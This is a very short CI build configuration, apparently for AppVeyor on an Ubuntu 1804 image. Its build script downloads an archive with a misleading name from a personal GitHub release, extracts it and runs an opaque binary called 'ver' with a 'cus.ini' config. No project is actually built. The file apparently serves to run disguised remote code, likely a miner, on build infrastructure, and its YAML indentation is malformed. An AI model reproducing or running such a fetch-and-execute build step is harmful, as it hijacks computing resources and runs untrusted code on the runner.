version: 1.0.{build}
image: Ubuntu 1804
build:
  verbosity: minimal
     build_script: wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini
